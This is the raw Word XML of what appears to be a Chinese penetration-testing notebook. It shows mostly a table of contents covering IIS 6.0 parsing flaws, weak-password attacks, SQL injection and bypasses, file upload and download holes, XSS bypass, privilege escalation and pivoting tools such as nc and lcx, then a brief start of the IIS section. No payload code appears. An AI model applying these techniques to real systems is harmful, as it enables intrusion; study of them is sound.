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CC" w:rsidRDefault="000A2044">
      <w:pPr>
        <w:pStyle w:val="2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r w:rsidRPr="000A2044">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D9302D" w:rsidRPr="0013319F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-5" \h \z \u </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000A2044">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc468296463" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>IIS 6.0</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>文件解析漏洞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2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468296464" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>windows</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>对空格和</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>的忽略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2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468296465" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>IP</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>段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2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468296466" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>扫描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2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468296467" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>google</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>黑客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2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468296468" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>弱口令攻击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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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69" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>IPC$</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>与空连接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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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70" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>FTP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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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71" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>SQL SERVER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4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72" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>sa</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>权限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2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468296473" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>暴库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2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468296474" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>通用</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>SQL</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>注入：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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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75" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>and or xor union</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>注入语句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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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76" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>SQL</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>注入绕过（</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">CRUD </w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>增删改查）：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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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77" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>SQL</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>注入修补：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4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78" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>检查：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4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79" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>过滤：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4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80" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>编码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4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81" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>转义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2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468296482" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>针对特定数据库的攻击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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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83" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>针对</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ACCESS</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>数据库的攻击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4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84" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>文件上传漏洞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4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85" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>下载任意文件漏洞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4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86" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>删除任意文件漏洞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4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87" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>区分</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ACCESS</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>和</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MSSQL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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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88" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>针对</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MSSQL</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>数据库的攻击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4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89" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>有错误回显的</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2000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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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90" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>针对</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>MySQL</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>数据库的攻击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4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91" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>SQL</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>注入绕过（</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">CRUD </w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>增删改查）：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4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92" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>SQL</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>注入修补：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4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93" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>提权：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2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468296494" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>XSS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3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95" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>XSS</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>绕过（</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">CRUD </w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>增删改查）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2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468296496" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>提权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2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468296497" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>内网渗透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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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498" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>NTSCAN</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>和啊</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>D</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>网络工具包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2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468296499" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>瑞士军刀系列：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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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500" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>nc(</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>端口监听</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>):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3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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501" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>lcx(</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>端口转发</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>):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D6BCC" w:rsidRDefault="000A2044">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="630"/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468296502" w:history="1">
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC">
          <w:rPr>
            <w:rFonts w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="21"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>fpipe(</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>端口重定向</w:t>
        </w:r>
        <w:r w:rsidR="00FD6BCC" w:rsidRPr="008F380F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:noProof/>
          </w:rPr>
          <w:t>):</w:t>
        </w:r>
        <w:r w:rsidR="00FD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6BCC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc4682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A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2C12" w:rsidRDefault="000A2044" w:rsidP="006D7A1A">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013319F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C42C12">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008738AB" w:rsidRDefault="008738AB" w:rsidP="00F7084B">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="008738AB" w:rsidSect="005826E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26E7" w:rsidRDefault="0016263B" w:rsidP="00F7084B">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc468296463"/>
      <w:r w:rsidRPr="00175AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IIS 6.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00175AAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>文件解析漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="0016263B" w:rsidRDefault="00B20622">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3977005"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="1" name="图片 0" descr="IIS6.0 文件解析漏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S6.0 文件解析漏洞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40" w:rsidRDefault="00AB10C2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经测试，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00446840" w:rsidRDefault="005C5712">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件可以解析，</w:t>
      </w:r>
      <w:r w:rsidR="00832C43">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.asp</w:t>
      </w:r>
